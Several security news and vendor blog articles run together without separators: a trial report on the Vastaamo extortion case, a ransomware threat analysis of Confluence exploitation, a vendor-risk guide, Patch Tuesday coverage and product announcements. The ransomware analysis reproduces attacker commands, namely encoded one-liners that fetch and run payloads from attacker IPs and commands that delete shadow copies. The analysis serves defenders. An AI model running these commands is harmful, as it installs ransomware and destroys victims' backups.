Alleged Extortioner of Psychotherapy Patients Faces Trial

Prosecutors in Finland this week commenced their criminal trial against Julius Kivimäki, a 26-year-old Finnish man charged with extorting a once popular and now-bankrupt online psychotherapy practice and thousands of its patients. In a 2,200-page report, Finnish authorities laid out how they connected the extortion spree to Kivimäki, a notorious hacker who was convicted in 2015 of perpetrating tens of thousands of cybercrimes, including data breaches, payment fraud, operating a botnet and calling in bomb threats.

In November 2022, Kivimäki was charged with attempting to extort money from the Vastaamo Psychotherapy Center. In that breach, which occurred in October 2020, a hacker using the handle “Ransom Man” threatened to publish patient psychotherapy notes if Vastaamo did not pay a six-figure ransom demand.

Vastaamo refused, so Ransom Man shifted to extorting individual patients — sending them targeted emails threatening to publish their therapy notes unless paid a 500-euro ransom. When Ransom Man found little success extorting patients directly, they uploaded to the dark web a large compressed file containing all of the stolen Vastaamo patient records.

Security experts soon discovered Ransom Man had mistakenly included an entire copy of their home folder, where investigators found many clues pointing to Kivimäki’s involvement. By that time, Kivimäki was no longer in Finland, but the Finnish government nevertheless charged Kivimäki in absentia with the Vastaamo hack. The 2,200-page evidence document against Kivimäki suggests he enjoyed a lavish lifestyle while on the lam, frequenting luxury resorts and renting fabulously expensive cars and living quarters.

But in February 2023, Kivimäki was arrested in France after authorities there responded to a domestic disturbance call and found the defendant sleeping off a hangover on the couch of a woman he’d met the night before. The French police grew suspicious when the 6′ 3″ blonde, green-eyed man presented an ID that stated he was of Romanian nationality.

A redacted copy of an ID Kivimaki gave to French authorities claiming he was from Romania.

Finnish prosecutors showed that Kivimäki’s credit card had been used to pay for the virtual server that hosted the stolen Vastaamo patient notes. What’s more, the home folder included in the Vastaamo patient data archive also allowed investigators to peer into other cybercrime projects of the accused, including domains that Ransom Man had access to as well as a lengthy history of commands he’d executed on the rented virtual server.

Some of those domains allegedly administered by Kivimäki were set up to smear the reputations of different companies and individuals. One of those was a website that claimed to have been authored by a person who headed up IT infrastructure for a major bank in Norway which discussed the idea of legalizing child sexual abuse.

Another domain hosted a fake blog that besmirched the reputation of a Tulsa, Okla. man whose name was attached to blog posts about supporting the “white pride” movement and calling for a pardon of the Oklahoma City bomber Timothy McVeigh.

Kivimäki appears to have sought to sully the name of this reporter as well. The 2,200-page document shows that Kivimäki owned and operated the domain krebsonsecurity[.]org, which hosted various hacking tools that Kivimäki allegedly used, including programs for mass-scanning the Internet for systems vulnerable to known security flaws, as well as scripts for cracking database server usernames and passwords, and downloading databases.

Ransom Man inadvertently included a copy of his home directory in the leaked Vastaamo patient data. A lengthy history of the commands run by that user show they used krebsonsecurity-dot-org to host hacking and scanning tools.

Mikko Hyppönen, chief research officer at WithSecure (formerly F-Secure), said the Finnish authorities have done “amazing work,” and that “it’s rare to have this much evidence for a cybercrime case.”

Petteri Järvinen is a respected IT expert and author who has been following the trial, and he said the prosecution’s case so far has been strong.

“The National Bureau of Investigation has done a good job and Mr Kivimäki for his part some elementary mistakes,” Järvinen wrote on LinkedIn. “This sends an important message: online crime does not pay. Traces are left in the digital world too, even if it is very tedious for the police to collect them from servers all around the world.”

Antti Kurittu is an information security specialist and a former criminal investigator. In 2013, Kurittu worked on an investigation involving Kivimäki’s use of the Zbot botnet, among other activities Kivimäki engaged in as a member of the hacker group Hack the Planet (HTP). Kurittu said it remains to be seen if the prosecution can make their case, and if the defense has any answers to all of the evidence presented.

“Based on the public pretrial investigation report, it looks like the case has a lot of details that seem very improbable to be coincidental,” Kurittu told KrebsOnSecurity. “For example, a full copy of the Vastaamo patient database was found on a server that belonged to Scanifi, a company with no reasonable business that Kivimäki was affiliated with. The leaked home folder contents were also connected to Kivimäki and were found on servers that were under his control.”

The Finnish daily yle.fi reports that Kivimäki’s lawyers sought to have their client released from confinement for the remainder of his trial, noting that the defendant has already been detained for eight months.

The court denied that request, saying the defendant was still a flight risk. Kivimäki’s trial is expected to continue until February 2024, in part to accommodate testimony from a large number of victims. Prosecutors are seeking a seven-year sentence for Kivimäki.

C3RB3R Ransomware | Ongoing Exploitation of CVE-2023-22518 Targets Unpatched Confluence Servers 

SentinelOne is currently monitoring increased exploitation of CVE-2023-22518, a recently identified vulnerability in Atlassian’s Confluence Datacenter and Server software. We have observed multiple campaigns leveraging the bug to deploy new C3RB3R (Cerber) ransomware variants targeting both Windows and Linux hosts.

In this post, we detail the attack chain observed in these incidents and provide recent indicators to help responders and threat hunters identify and mitigate similar attacks in these ongoing campaigns.

Background

CVE-2023-22518 is an improper authorization vulnerability of all versions of Atlassian’s Confluence Data Center and Server which allows for an unauthenticated remote attacker to create a backdoor administrator account for an exposed Confluence instance. The remote attacker can then use the backdoor account to perform unauthorized actions.

First disclosed on October 31, 2023, CVE-2023-22518 was subsequently updated from CVSS score 9.1 to 10 on November 6, after further reports of active in-the-wild exploits and related ransomware incidents.

According to Atlassian’s notice, the following Confluence Data Center and Server versions, along with any software created before the earliest listed version, are vulnerable to this issue and at critical risk:

  • Version ​​7.19.16
  • Version 8.3.4
  • Version 8.4.4
  • Version 8.5.3
  • Version 8.6.1

When running a Shodan search using the hash value query http.favicon.hash:-305179312, we observed over 5,000 vulnerable environments.

Shodan results for Confluence instances exposed to CVE-2023-22518
Shodan results for Confluence instances exposed to CVE-2023-22518

Cerber ransomware has existed in various phases since 2016. It has operated as a semi-private RaaS since at least 2020 and saw a spike in usage through 2021 and 2022. Cerber payloads exist for both Linux and Windows. More recent payloads, associated with this campaign and others, display the “C3RB3R” branding. This is visible in the ransom note as well the victim payment portal.

C3RB3R Ransom note
Excerpt from a C3RB3R ransom note

C3RB3R Ransomware Payload Delivery

As noted above, CVE-2023-22518 is an ‘Improper Authorization’ vulnerability, which allows for the Confluence instance to be reset, followed by the attacker being able to create an administrative account and thus obtain full control of the system.

Initial compromise is achieved via a specially-crafted HTTP-POST command directed at the exposed Confluence instance. These requests are directed at the setup-restore.action configuration, activity which can be observed in the logs (example from Atlassian):

[02/Nov/2023:19:40:01 +0530] - http-nio-8090-exec-1 127.0.0.1 POST /json/setup-restore.action HTTP/1.1 403 46ms 1198 http://YOURSERVERHOST/login.action?os_destination=%2Findex.action&permissionViolation=true Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:40:08 +0530] - http-nio-8090-exec-4 127.0.0.1 POST /json/setup-restore.action?synchronous=false HTTP/1.1 302 78ms - http://YOURSERVERHOST/json/setup-restore.action Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:40:09 +0530] - http-nio-8090-exec-3 127.0.0.1 GET /json/setup-restore-progress.action?taskId=5a7af4cd-698d-4e3d-8bd4-a411c779d519 HTTP/1.1 200 24ms 277 http://YOURSERVERHOST/json/setup-restore.action Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36

Once the attacker has established an administrative account on the instance, they are able to execute further commands, in this case the next set of scripts used to download and execute the appropriate payload to decode and execute. Execution of these scripts is handled through the use of a compatible webshell. Atlassian notes the use of a malicious plugin named web.shell.Plugin.

Atlassian’s Advisory regarding web.shell.Plugin
Atlassian’s Advisory including web.shell.Plugin as an indicator

The appearance of the malicious plugin has been noted in Atlassian’s community forum.

Atlassian community posting on appearance of a malicious web shell
Atlassian community posting on appearance of a malicious webshell

Threat actors then deploy PowerShell scripts to identify whether or not to use an available proxy server for the Confluence server communications. Depending on the needs, different download methods are provided for the next stage payloads.

Download_Execute PowerShell function
Download_Execute PowerShell function

The following IP addresses were used by threat actors to download the C3RB3R ransomware payloads:

45.145[.]6.112
193.43.72[.]11
193.176.179[.]41

These remote servers were observed hosting both Linux and Windows versions of C3RB3R payloads.

The initial set of payloads were stored on the C2 (not reachable as of this writing) under inconspicuous names. For example:

  • “agae”
  • “mdrg”
  • “tmp.1u.txt”
  • “tmp.5p.txt”
  • “tmp32.txt”
  • “tmp37.txt”
  • “tmp37”
  • “tmp48.txt”

Linux Infection Details

Upon targeting CVE-2023-22518, the parent process of Confluence (in this case, Java) will be used for command injection. Upon compromise, we observed the following command being executed to download and spawn the later stage components, ultimately leading to C3RB3R execution.

sh -c echo -n ZWNobyAtbiBodHRwOi8vMTkzLjE3Ni4xNzkuNDEvYWdhZSA+IC90bXAvbHJ1 | base64 -d | sh

The base64 encoded command above decodes to:

echo -n http[:]//193[.]176.179.41/agae > /tmp/lru.

The tmp/lru file contains a dictionary of download URLS that correspond to different architectures.

The following command begins the download and execution of the next stage of the attack, which results in the spawning of further commands, depending on the version of Python available on the host.

sh -c echo -n
aW1wb3J0IG9zLHN5cyxiYXNlNjQKaWYgc3lzLnZlcnNpb25faW5mby5tYWpvciA9PSAzOgoJaW1wb3J0IHVybGxpYi5yZXF1ZXN0IGFzIHUKCXAgPSAiMyIKZWxzZToKCWltcG9ydCB1cmxsaWIyIGFzIHUKCXAgPSAiMiIKaCA9ICcvdG1wL2xydScKdHJ5OgoJZm9yIGwgaW4gb3BlbihoKToKCQlyID0gdS51cmxvcGVuKGwrJy5zcCcpCgkJcDIgPSBiYXNlNjQuYjY0ZGVjb2RlKHIucmVhZCgpKS5kZWNvZGUoInV0Zi04IikKCQlyLmNsb3NlKCkKCQlvcy5zeXN0ZW0oInB5dGhvbiIrcCsiIC1jIFwiIitwMisiXCIgfHwgcHl0aG9uIC1jIFwiIitwMisiXCIgJiIpCmV4Y2VwdDoKCXBhc3MK 
| base64 -d | python2 || echo -n
aW1wb3J0IG9zLHN5cyxiYXNlNjQKaWYgc3lzLnZlcnNpb25faW5mby5tYWpvciA9PSAzOgoJaW1wb3J0IHVybGxpYi5yZXF1ZXN0IGFzIHUKCXAgPSAiMyIKZWxzZToKCWltcG9ydCB1cmxsaWIyIGFzIHUKCXAgPSAiMiIKaCA9ICcvdG1wL2xydScKdHJ5OgoJZm9yIGwgaW4gb3BlbihoKToKCQlyID0gdS51cmxvcGVuKGwrJy5zcCcpCgkJcDIgPSBiYXNlNjQuYjY0ZGVjb2RlKHIucmVhZCgpKS5kZWNvZGUoInV0Zi04IikKCQlyLmNsb3NlKCkKCQlvcy5zeXN0ZW0oInB5dGhvbiIrcCsiIC1jIFwiIitwMisiXCIgfHwgcHl0aG9uIC1jIFwiIitwMisiXCIgJiIpCmV4Y2VwdDoKCXBhc3MK 
| base64 -d | python3

Decoded, these scripts resemble the following output:

Decoded C3RB3R execution script
Decoded C3RB3R execution script

These Python scripts are responsible for downloading an appropriate version of qnetd, which in turn downloads and executes the final C3RB3R malware payload.

Ransomware Payload Behavior (Windows)

The Windows versions of C3RBER are launched with the -b 9 argument, through a hidden window controlled via scripts on the remote C2. The ransomware will attempt to remove VSS (Volume Shadow Copies) via WMIC.EXE for each identified shadow copy. For example:

cmd.exe /c C:WindowsSystem32wbemWMIC.exe shadowcopy where "ID='{xxxx392B-3896-49EE-8B43-0233022xxxxx}'" delete
cmd.exe /c C:WindowsSystem32wbemWMIC.exe shadowcopy where "ID='{xxxx993A-B10A-4650-A272-5E11743xxxxx}'" delete

The ransomware will traverse (and encrypt) local drive volumes as well as connected and accessible SMB shares. Encrypted files are modified with the .L0CK3D extension.

Ransom Note

The ransom note is written as read-me3.txt. Victims are given a unique portal TOR-based URL. In these specific campaigns, all victims are directed to:

j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion.
C3RB3R Ransom Note
C3RB3R Ransom Note

Victims are warned that data has been both encrypted and exfiltrated, and that failure to pay will result in the threat actors selling the stolen data on the dark web. Directions are given on how to purchase the C3RB3R decryptor via bitcoin.

C3RB3R Decryptor Page
C3RB3R Decryptor Page

SentinelOne Protects Against Cerber Ransomware

SentinelOne customers are protected against Cerber ransomware. The SentinelOne Singularity™ detects and prevents malicious behavior and artifacts associated with C3RB3R (Cerber) ransomware campaigns.

SentinelOne Detection C3RB3R (Windows)
SentinelOne Detection C3RB3R (Windows)
SentinelOne Detection C3RB3R (Windows)

Conclusion

Threat actors continue to explore vulnerabilities in collaboration and enablement platforms as a means of initial access. Atlassian Confluence is the latest platform being exploited by threat actors in this manner, and teams defending exposed environments are urged to take appropriate measures to ensure protection. A patch for CVE-2023-22518 is available and Atlassian has provided guidance on temporary mitigations for those that are unable to patch immediately.

Beyond the vendor’s guidance, strong endpoint security controls are required to protect against such ransomware payloads. We assess that these campaigns are ongoing and that further attacks targeting unprotected hosts accessible through vulnerable Confluence instances are highly likely.

To learn about how SentinelOne can help protect the devices in your fleet from ransomware and other threats, contact us or request a free demo.

Indicators of Compromise

Executables (SHA1)
1243e256f9e806652ba8e719273494f84795bbfe
2c3b2a6e741cb5d3be7299de007983f1f86c0ef5
47c6fdf51760c13d2602909ddbbb84ef8e33f992
8988ef7abd931496d7bbdf7db1a67c9def0641d9
ada7160c49cb22f569265fe3719fa2713a24dcf1
f4384ca1c2250d58a17e692ce2a8efd7dcc97a73

Network Communications

45.145[.]6.112
193.43.72[.]11
193.176.179[.]41
193[.]187.172.73
j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

Hidden Vulnerabilities | Effective Third-Party Risk Management in the Age of Supply Chain Attacks

A recent study reported that most organizations partner with an average of ten third-party vendors to help them manage and grow their operations. Researchers also noted that a glaringly high 98% of organizations were found to have existing vendor relationships with at least one third-party that has experienced a breach in the last two years.

A breach in one vendor’s network can serve as a gateway to compromising the rest of the supply chain, but how can a business effectively manage risks coming from vendors over which they have no operational control? In this post, we explore how to build a third-party risk management program and offer guidance on best practices for responding to a breach in a vendor partner.

A Brief History of Software Supply Chain Attacks

Digital supply chain attacks represent a strategic shift for cybercriminals, offering a pathway to compromise multiple organizations through a single, often unsuspecting, point of entry. By infiltrating suppliers’ networks, adversaries can inject malicious code, compromise data integrity, and even manipulate physical processes in manufacturing and distribution. Attacks using this approach have risen in the last five or six years as evidenced by a number of high-profile incidents such as:

  • NotPetya (2017) – malware entered systems through the compromised update process of Ukrainian accounting software, MeDoc. Initially disguised as ransomware, it was later revealed to be a destructive wiper malware, causing widespread disruption globally. Its impact was particularly severe due to its ability to spread rapidly across networks.
  • BitPay/Copay (2018) – Attackers compromised the Copay wallet software supply chain, injecting malicious code that enabled them to steal cryptocurrency. The breach highlighted the vulnerability of cryptocurrency wallets, impacting users who unknowingly installed the compromised software.
  • ShadowHammer (2019) – A sophisticated attack targeted the update process of ASUS Live Update Utility, compromising its distribution channel. Millions of users unknowingly downloaded a malicious version, allowing attackers to conduct targeted espionage. The attack was serious due to its widespread scope and the potential for espionage on a massive scale.
  • SolarWinds (2020) – A highly sophisticated supply chain attack compromised the update mechanism of SolarWinds’ Orion software, impacting major organizations and government agencies. The attackers gained unauthorized access, posing a severe threat to national security by compromising critical systems and sensitive data.
  • Kaseya (2021) – Exploiting a vulnerability in the Kaseya VSA software, REvil launched a ransomware attack that affected numerous managed service providers (MSPs) and their clients. This incident demonstrated the potential for cascading effects, impacting a large number of organizations through a single supply chain compromise.
  • International Committee of the Red Cross (2022) – A cyber espionage group compromised the update mechanism of the ICRC’s software. The attack posed significant risks due to the sensitivity of the organization’s operations and the potential compromise of confidential humanitarian data.
  • SmoothOperator (2023) – A supply chain attack attributed to North Korean-aligned threat actors on 3CX, a VoIP phone software supplier, involved the insertion of malicious code into software updates. The compromised updates affected numerous downstream clients. 3CX claims to have 600,000 customer companies across a broad range of industry verticals including automotive, hospitality, MSPs and Manufacturing.

Two main factors contribute to the increasing prevalence of digital supply chain attacks. Firstly, the growing complexity and interconnectivity of supply chains provide a broader attack surface for adversaries to exploit. Secondly, the reliance on digital technologies and the adoption of Industry 4.0 practices introduce new vulnerabilities. Smart manufacturing, IoT devices, and cloud-based systems, while enhancing operational efficiency, have all created new potential avenues for exploitation.

For small to medium-sized businesses (SMBs), the supply chain ecosystem often involves smaller vendors with limited cybersecurity resources, making them attractive targets for attackers seeking a foothold into larger enterprises. This interconnected web of dependencies, combined with the evolving sophistication of cyber threats, creates a perfect storm for the proliferation of supply chain attacks.

Storing Up Trouble for the Future | Data Breaches & Leaks

A major concern after a compromise of a third-party vendor is the potential misuse of data acquired from the breach. This ill-gotten information can become a potential tool for future malicious activities, ranging from identity theft and fraud to account abuse and external account takeover attacks. A third-party might be compromised while hosting a company’s data, or attackers may initially target the third party and then leverage that access to breach the target organization’s IT systems.

In the case of the 3CX attack, security researchers have found that stolen data from an older cyberattack on a different software firm was then used to launch the attack on 3CX. Given the intricate degree of connection between global vendors, it is likely that 3CX was not the only company compromised in the earlier-attack.

Building a Third-Party Risk Management (TPRM) Program

Based on the latest findings from the Ponemon Institute, third-party-based cyber attacks have increased from 44% to 49% year over year with key reasons including:

  • Low rates of access governance and visibility control implementation at the organizational level via identity and access management tools
  • Overprivileged vendor accounts and lack of zero-trust policies implemented at the network level
  • Lack of continuous monitoring of third-party access to network resources and critical data

Establishing a robust Third-Party Risk Management (TPRM) Program is essential for business leaders to safeguard their organizations from potential introduced by their external partners.

The following questionnaire can be used as a guideline to get started:

Establish a Standard Vendor Assessment Process

  • What base contractual obligations outlining security responsibilities are required for the industry and business?
  • What due diligence practices, including the evaluation of the vendors’ cybersecurity measures, regulatory compliance, and overall risk posture, are in place
  • What cybersecurity frameworks are required for the third-party vendor? Are they fully compliant with those regulations and been audited to ensure compliance with regulatory requirements?
  • Does the vendor have a history of suffering data breaches?
  • What laws are in place within the vendor’s country that require them to disclose data or other important information?

Get to Know Your Vendor’s Cybersecurity Strategies

  • What is the level of sensitivity of the data or services the vendor expected to handle?
  • Is the vendor able to provide the required industry standard security certifications?
  • Does the vendor have cybersecurity insurance?
  • Does the vendor’s tool stack and system support single-sign on (SSO)?
  • What types of data will the vendor’s system or service be storing, processing, and/or accessing?

Establish All Contractual Security Expectations & Requirements

  • What cybersecurity service level agreements (SLAs) are needed for the partnership?
  • What current security risks does the vendor face, or foresee itself facing in the near future? What solutions or processes are in place to mitigate these risks?
  • What security measures are currently in place to fulfill capabilities like continuous monitoring, breach alerts/notifications, endpoint/cloud/identity security, data access, etc.

What To Do If Your Third-Party Vendor Is Compromised

In the event that a third-party vendor is under active cyberattack or has found evidence of breach, business leaders and security teams can use the below checklist to act quickly and contain the potential fallout.

1 – Containment, Remediation & Documentation

Activate the incident response plan (IRP) immediately. This involves isolating the compromised systems, containing the breach, and assessing the extent of the damage. At the same time, establish secure communication lines with the affected vendor to collect any crucial insights or details into the nature of the attack, what potential data was compromised, and any details on pathways exploited by the cyber attackers. To do so, interview those who first discovered the breach and document the investigative process.

2 – Forensic Investigation & PR Communications

Forensic investigations play a critical role in uncovering the origins and methods of the cyberattack. Engaging cybersecurity experts to conduct a thorough analysis can help determine the extent of the compromise, identify the specific tactics used by the attackers, and provide valuable insights to fortify defenses against similar threats in the future.

Initiate any public relations and external communications strategy to provide transparent and timely communication with relevant authorities, customers, stakeholders, and the public to maintain trust and credibility. Craft clear and accurate messages that outline the incident, the steps taken to address it, and the measures implemented to prevent future occurrences.

3 – Thorough Reviews & Intel Sharing

Collaboration and transparency are crucial in this phase. All affected parties can mutually benefit from sharing threat intelligence and agreeing on next steps to remediate the vulnerabilities that led to the breach. Simultaneously, organizations should initiate a thorough review of their own systems to assess whether the breach has cascaded into their networks, and if so, take immediate steps to address and neutralize the threat.

4 – Lessons Learned, Audits & Continuous Improvement

Post-incident, a rigorous evaluation of the vendor’s cybersecurity practices can help prevent future attacks. This includes a reassessment of the vendor’s security protocols, risk management strategies, and overall cybersecurity hygiene. A thorough audit will help determine the effectiveness of the vendor’s response to the incident and ensure that appropriate measures are in place to prevent a recurrence.

As part of the ongoing cybersecurity strategy, organizations can prioritize continuous monitoring and assessment of their third-party vendors. This involves regularly scrutinizing the security posture of vendors, ensuring compliance with established security standards, and staying vigilant for emerging threats. Establishing a robust vendor risk management program that includes periodic security assessments, penetration testing, and vulnerability scanning help maintain a proactive posture going forward.

Ultimately, the key to navigating the aftermath of a third-party vendor cyber compromise lies in a combination of rapid response, open communication, collaborative remediation efforts, and a commitment to ongoing vigilance and risk management.

Conclusion

Given the amount of sensitive data and assets organizations share with their third-party vendors, any attacks they face can reverberate through the entire network and set off a chain reaction. Global reliance on third-party vendors in the business landscape comes with a set of inherent cyber risks that organizations across all industries must grapple with. These risks stem from the closely-connected nature of supply chains, where vendors often have access to sensitive data and systems.

To safeguard organizations from third-party related cyber risks, C-level executives and security leaders continue to rely on autonomous, AI-driven cybersecurity platforms like SentinelOne for all-around protection. Learn how SentielOne’s Singularity™ XDR defends across all possible attack surfaces by contacting us today or booking a demo.

SentinelOne Singularity XDR
Supercharge. Fortify. Automate. Extend protection with unfettered visibility, proven protection, and unparalleled response.

Microsoft Patch Tuesday, November 2023 Edition

Microsoft today released updates to fix more than five dozen security holes in its Windows operating systems and related software, including three “zero day” vulnerabilities that Microsoft warns are already being exploited in active attacks.

The zero-day threats targeting Microsoft this month include CVE-2023-36025, a weakness that allows malicious content to bypass the Windows SmartScreen Security feature. SmartScreen is a built-in Windows component that tries to detect and block malicious websites and files. Microsoft’s security advisory for this flaw says attackers could exploit it by getting a Windows user to click on a booby-trapped link to a shortcut file.

Kevin Breen, senior director of threat research at Immersive Labs, said emails with .url attachments or logs with processes spawning from .url files “should be a high priority for threat hunters given the active exploitation of this vulnerability in the wild.”

The second zero day this month is CVE-2023-36033, which is a vulnerability in the “DWM Core Library” in Microsoft Windows that was exploited in the wild as a zero day and publicly disclosed prior to patches being available. It affects Microsoft Windows 10 and later, as well as Microsoft Windows Server 2019 and subsequent versions.

“This vulnerability can be exploited locally, with low complexity and without needing high-level privileges or user interaction,” said Mike Walters, president and co-founder of the security firm Action1. “Attackers exploiting this flaw could gain SYSTEM privileges, making it an efficient method for escalating privileges, especially after initial access through methods like phishing.”

The final zero day in this month’s Patch Tuesday is a problem in the “Windows Cloud Files Mini Filter Driver” tracked as CVE-2023-36036 that affects Windows 10 and later, as well as Windows Server 2008 at later. Microsoft says it is relatively straightforward for attackers to exploit CVE-2023-36036 as a way to elevate their privileges on a compromised PC.

Beyond the zero day flaws, Breen said organizations running Microsoft Exchange Server should prioritize several new Exchange patches, including CVE-2023-36439, which is a bug that would allow attackers to install malicious software on an Exchange server. This weakness technically requires the attacker to be authenticated to the target’s local network, but Breen notes that a pair of phished Exchange credentials will provide that access nicely.

“This is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other vulnerable internal targets – just because your Exchange Server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said.

Breen said this vulnerability goes hand in hand with three other Exchange bugs that Microsoft designated as “exploitation more likely:” CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035.

Finally, the SANS Internet Storm Center points to two additional bugs patched by Microsoft this month that aren’t yet showing signs of active exploitation but that were made public prior to today and thus deserve prioritization. Those include: CVE-2023-36038, a denial of service vulnerability in ASP.NET Core, with a CVSS score of 8.2; and CVE-2023-36413: A Microsoft Office security feature bypass. Exploiting this vulnerability will bypass the protected mode when opening a file received via the web.

Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

The Future As One | Major Announcements from SentinelOne’s Inaugural OneCon

Last week in Boca Raton, Florida, SentinelOne hosted OneCon, our first-ever customer conference, which brought together some of the brightest minds from the cybersecurity community today.

Even in its earliest stages, we envisioned OneCon to be the industry’s most forward-thinking event, aimed at exploring new and innovative ways of thinking about security. For those who weren’t able to join us in person, read on for a round-up of all of the highlights from this year’s gathering.

Key News at OneCon23

Recognizing the business imperative of embedding a comprehensive security approach across the organization, we kicked off OneCon with the launch of PinnacleOne, a new strategic risk analysis and advisory group to support today’s organizational leaders. Led by industry experts Chris Krebs and Alex Stamos, Pinnacle One will help today’s executives with unparalleled intelligence, risk management insights, and transformative strategies to navigate today’s ever-changing threat landscape.

For this event, our focus was equipping customers with the innovative technology required to tackle both present and future cybersecurity challenges. In today’s ever-changing threat landscape and uncertain economic environment, enterprises are looking to increase efficiency, focus on what’s important, and accelerate their security operations to stay ahead of attacks.

To help our customers secure now and in the future, SentinelOne announced a unified set of innovations for the Singularity™ Platform:

  • Purple AI (Beta), an AI assistant to unify, accelerate, and simplify SecOps workflows
  • Singularity Endpoint’s new unified agent, covering endpoint and identity attack surfaces for continuous, real-time protection
  • Singularity Cloud Workload Security’s integration with Snyk to deliver code-to-cloud security
  • Singularity Data Lake, a central, unified solution for security and IT analytics streamlining ingestion, normalization, and visualization for rapid queries, retention, and processing.

“Enterprises don’t just need a robust and capable platform, they also need intelligent automation that simplifies the analyst experience and boosts the productivity of their security teams” shared Ric Smith, Chief Product & Technology Officer at SentinelOne, in his OneCon keynote. “Guided by our belief that the fusion of design-driven product development and AI culminates in an unparalleled security experience, the Singularity Unity Release is meticulously crafted to heighten user experience and fortify security measures.”

PinnacleOne Advisory Group | Unparalleled Insights & Transformative Risk Management

In the face of increasingly complex and vulnerable systems, enterprise leaders contend with a changing global business landscape and developing geopolitical risks that, to cybercriminals and nation-state threat actors, creates avenues for attack.

To support C-suite leaders, SentinelOne launched PinnacleOne at OneCon as a strategic risk analysis and advisory group. Through PinnacleOne, customers will have access to an elite team of experts, led by industry experts Chris Krebs and Alex Stamos, who will help today’s executives with unparalleled intelligence, risk management insights, and transformative strategies.

It all comes back down to the idea of fostering open communication and community. PinnacleOne was created as a direct response to those asking for help in solving the big security challenges and making sure their future path is a safe one. SentinelOne gives a warm welcome to Krebs, joining SentinelOne as Chief Intelligence and Public Policy Officer and President of PinnacleOne and Stamos, who will serve as Chief Trust Officer for SentinelOne.

“In launching PinnacleOne, we are providing access to top experts who can help enterprises think bigger and broader than the siloed approaches of today.”, said Tomer Weingarten, CEO, SentinelOne. “Our holistic approach to risk management will empower organizations to adapt and move forward with confidence across all products and environments.”

For more information on the PinnacleOne Advisory Group, read our Press Release here.

Purple AI | Empowering Analysts to Detect Earlier, Respond Faster & Stay Ahead of Attacks

SentinelOne is proud to be a pioneer in the application of AI to cybersecurity with the industry’s first AI-powered security platform. At OneCon, we announced our continued leadership with the beta release of Purple AI – our generative AI assistant that unifies, accelerates, and simplifies SecOps to help protect what matters most.

Today’s SecOps teams must contend with long alert queues, thousands of investigation hours, and complex configuration tasks, all compounded by a growing skills gap putting pressure on advanced analysts. This leaves little time for proactive threat hunting and results in analyst burnout and an overtaxed SOC.

Purple AI is a force multiplier that saves time and resources for security teams by scaling autonomous protection across the enterprise. Unify your workflows with a single place to access data across the platform and partner logs, and scale collaboration across teams using notebooks, which can save, tag, and export investigation workflows.

Simplify the complex by using natural language to streamline threat hunting and investigations. Every level of analyst is empowered with instructional hunting prompts, AI-powered auto-summaries, suggested queries, and actionable next steps. Finally, accelerate SecOps workflows with Purple AI’s auto-investigations* to collect evidence from the Singularity Data Lake, generate reports, and help determine a verdict for detected threats.

Underpinning it all, know that your data and privacy are protected. Purple AI models do not train using your data or requests, and we never share your processes or insights with other customers. To learn more, sign up for a demo today.

*Coming post-GA

Endpoint Security | Advanced Protection for Identity and Exposure Management

SentinelOne’s platform strategy focuses on enterprise-grade prevention, detection, and response across all attack surfaces from endpoints and devices to servers. The Singularity Platform Unity Release enhances customers’ endpoint security experience through new features like Identity (conditional access and breached password detection) and Attack Surface and Exposure Management (prioritizing and managing vulnerability exposures).

These new features will be seamlessly delivered in a single, rebootless agent with advanced behavioral detections built-in.

Cloud Security | Delivering Enhanced Protection with CNAPP

As part of the 12-month roll-out, the Singularity Platform will soon feature a comprehensive Cloud-Native Application Protection Platform (CNAPP) designed to safeguard public and private cloud infrastructures. By combining both agent and agentless capabilities, the platform will provide robust run-time protection and real-time defenses against threats, misconfigurations, and exposed secrets.

All of these features are set to integrate seamlessly with Singularity Operations Center and Data Lake, providing customers with deep visibility and operational governance over their entire digital estate.

The SentinelOne & Snyk Integration | Cloud Workload Protection From Build Time to Runtime

The complexity of the modern software supply chain and supporting apps makes prioritizing fixes a challenge for software developers and security teams. To solve this, SentinelOne has joined forces with Snyk, a leading force in developer security to announce a new cloud-native security integration.

The OneCon crowd was first to hear about this latest integration, which works by correlating SentinelOne-identified cloud runtime threat detections together with vulnerabilities found by Snyk in container images. The integration empowers cloud security, application security, and developer teams to more effectively collaborate and address the root cause of rising issues.

While developers are under increasing pressure to build applications faster, they must also work with their security teams to secure both their build and runtime environments. The SentinelOne & Snyk integration supports this process by providing security teams the means to manage application risks in the cloud. This in turn simplifies the prioritization and remediation focus for developers.

The integration is now available to SentinelOne and Snyk customers through the Singularity Marketplace. Learn more about the integration here.

Singularity Data Lake | Cost-Effective, High Performance Security & Log Analytics

Singularity Data Lake enables organizations to centralize and transform data for cost-effective, high-performance security and log analytics. This consolidated, AI-powered security and log data platform brings together Security Information and Event Management (SIEM), Extended Detection Response (XDR), and Log Analytics solutions. By streamlining cybersecurity and IT operations, it reduces complexity and enhances effectiveness in managing security.

Singularity Data Lake leverages the Open Cybersecurity Schema Framework (OCSF) to normalize all types of data, offering a full view of an organization’s security and data analytics. Its cloud-native architecture and marketplace of connectors simplify data importation and promote cost efficiency and scalability, leading to significant cybersecurity cost savings.

Singularity Data Lake empowers organizations to confidently navigate the ever-evolving threat landscape. By providing centralized data management, faster detection, advanced analysis, and enhanced investigation capabilities, these solutions offer more than just another cybersecurity product – they comprise a comprehensive data platform that drives business value and keeps organizations secure in today’s digital landscape.

Conclusion

We created OneCon as a space for cyber defenders to learn, share, and equip themselves with the tools and inspiration to confidently tackle today’s security challenges.

For the SentinelOne team, true enterprise-wide security lies in proactively and comprehensively securing the entire organization with the power of AI. In the face of a changing threat landscape, we are glad to be in the company of leading cybersecurity experts who are ready to collectively shift with us.

